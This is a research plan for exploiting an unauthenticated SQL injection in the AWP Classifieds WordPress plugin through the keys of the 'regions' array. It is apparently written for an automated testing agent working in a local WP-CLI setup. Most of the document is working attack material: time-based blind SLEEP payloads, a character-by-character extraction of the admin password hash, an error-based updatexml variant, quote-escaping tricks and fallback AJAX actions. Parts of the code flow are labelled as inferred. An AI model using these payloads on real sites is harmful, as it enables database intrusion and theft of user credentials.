AWP Classifieds <= 4.4.5 - Unauthenticated SQL Injection via 'regions'

This research plan focuses on exploiting a SQL Injection vulnerability in AWP Classifieds (<= 4.4.5) via the keys of the regions parameter array.

1. Vulnerability Summary

The AWP Classifieds plugin fails to properly sanitize or prepare SQL queries when processing the regions parameter in certain AJAX actions. Specifically, the plugin iterates over the regions array and uses the keys of this array directly in a SQL statement. Since array keys in PHP are often overlooked during sanitization (which usually focuses on values), an attacker can inject malicious SQL by crafting a request with a payload as the key.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action: awpcp-get-regions-options (inferred as the primary handler for region selection).
• Vulnerable Parameter: regions (array keys).
• Authentication: Unauthenticated (wp_ajax_nopriv_awpcp-get-regions-options).
• Payload Location: URL-encoded POST body.
• Preconditions: The "Regions" feature must be enabled in AWP Classifieds settings, and at least one region (e.g., a country) should exist in the database to trigger the code path.

3. Code Flow (Inferred)

1. Entry: The request hits admin-ajax.php with action=awpcp-get-regions-options.
2. Dispatch: WordPress executes the hook wp_ajax_nopriv_awpcp-get-regions-options, calling the handler (likely in Regions_AJAX_Handler or similar).
3. Input Processing: The handler retrieves $_POST['regions'].
4. Vulnerable Sink: The code iterates through the array:

   foreach ( $_POST['regions'] as $region_id => $region_data ) {
       // The $region_id (the key) is used in a query without $wpdb->prepare()
       $wpdb->get_results( "SELECT ... FROM ... WHERE parent_id = $region_id" );
   }
   

5. Execution: The database executes the injected SQL within the $region_id context.

4. Nonce Acquisition Strategy

AWP Classifieds typically uses a nonce for its AJAX operations. If the handler enforces a nonce check via check_ajax_referer(), it must be extracted from the frontend.

1. Identify Page: The region selector is usually found on the "Browse Ads", "Search Ads", or "Place Ad" pages.
2. Shortcode: [awpcpsearchposts] or [awpcp_place_ad].
3. Creation:

   wp post create --post_type=page --post_title="Search Ads" --post_status=publish --post_content='[awpcpsearchposts]'
   

4. Extraction:
   • Navigate to the newly created page.
   • The plugin localizes data in a variable usually named awpcp_ajax_data or awpcp_regions_data.
   • JavaScript to execute: window.awpcp_ajax_data?.nonce or window.awpcp_regions_data?.nonce.

5. Exploitation Strategy

We will use a time-based blind SQL injection payload because the results of the regions query might not be directly reflected in a way that allows easy UNION extraction.

• Payload Target: Array key of regions.
• Payload Type: Time-based (SLEEP).
• HTTP Tool: http_request.

Step-by-Step:

1. Baseline Request:
   Send a legitimate-looking request to establish a baseline response time.

   {
       "action": "awpcp-get-regions-options",
       "regions[0]": "1"
   }
   

2. Exploit Request (Sleep 5):
   Inject the payload into the key. Note the closing bracket ] in the parameter name to terminate the array key correctly in PHP's parser.

   {
       "action": "awpcp-get-regions-options",
       "regions[0 AND (SELECT 1 FROM (SELECT SLEEP(5))x)]": "1"
   }
   

3. Data Extraction (Boolean-based or Sleep-based):
   To extract the admin user's password hash:

   {
       "action": "awpcp-get-regions-options",
       "regions[0 AND (SELECT 1 FROM (SELECT SLEEP(5))x WHERE (SELECT SUBSTRING(user_pass,1,1) FROM wp_users WHERE ID=1)='$')]": "1"
   }
   

6. Test Data Setup

1. Install/Activate: Ensure AWP Classifieds is active.
2. Enable Regions:

   wp option update awpcp-enable-regions-module 1
   

3. Add a Region: (Crucial for ensuring the query actually executes)
   Use the plugin's admin UI or WP-CLI to ensure at least one country is defined in the awpcp_regions table.
4. Create Search Page:

   wp post create --post_type=page --post_title="Exploit Test" --post_status=publish --post_content='[awpcpsearchposts]'
   

7. Expected Results

• Vulnerable Response: The HTTP request will hang for approximately 5 seconds before returning a response (likely a JSON object with success: true or a 0).
• Non-Vulnerable Response: The request returns immediately with a 0 or an error message if the key is rejected.

8. Verification Steps

After the HTTP exploit, verify the database state to confirm the impact:

1. Check SQL execution: If the server logs are available, check wp-content/debug.log (if SAVEQUERIES is on).
2. Observe Database behavior: Use wp db query "SHOW PROCESSLIST" immediately after sending the payload to see the sleeping process.
3. Confirm User Data: If using the exploit to change data (not recommended for PoC, stick to extraction), verify with:

   wp user get 1 --fields=user_pass
   

9. Alternative Approaches

• Error-Based: If WP_DEBUG is enabled, try regions[0 AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1)),1)]. AWP Classifieds occasionally outputs database errors in its AJAX responses.
• Different Action: If awpcp-get-regions-options is patched or requires high privileges, check awpcp-update-region-selection or awpcp_get_locations_options.
• Key Termination: If the simple array key payload fails, try escaping with quotes: regions[0' AND SLEEP(5) AND '1'='1]. However, since this is a key, WordPress's GPC (Global, Post, Cookie) magic quotes/slashes may interfere if not handled carefully. Use hex encoding for strings if quotes are escaped.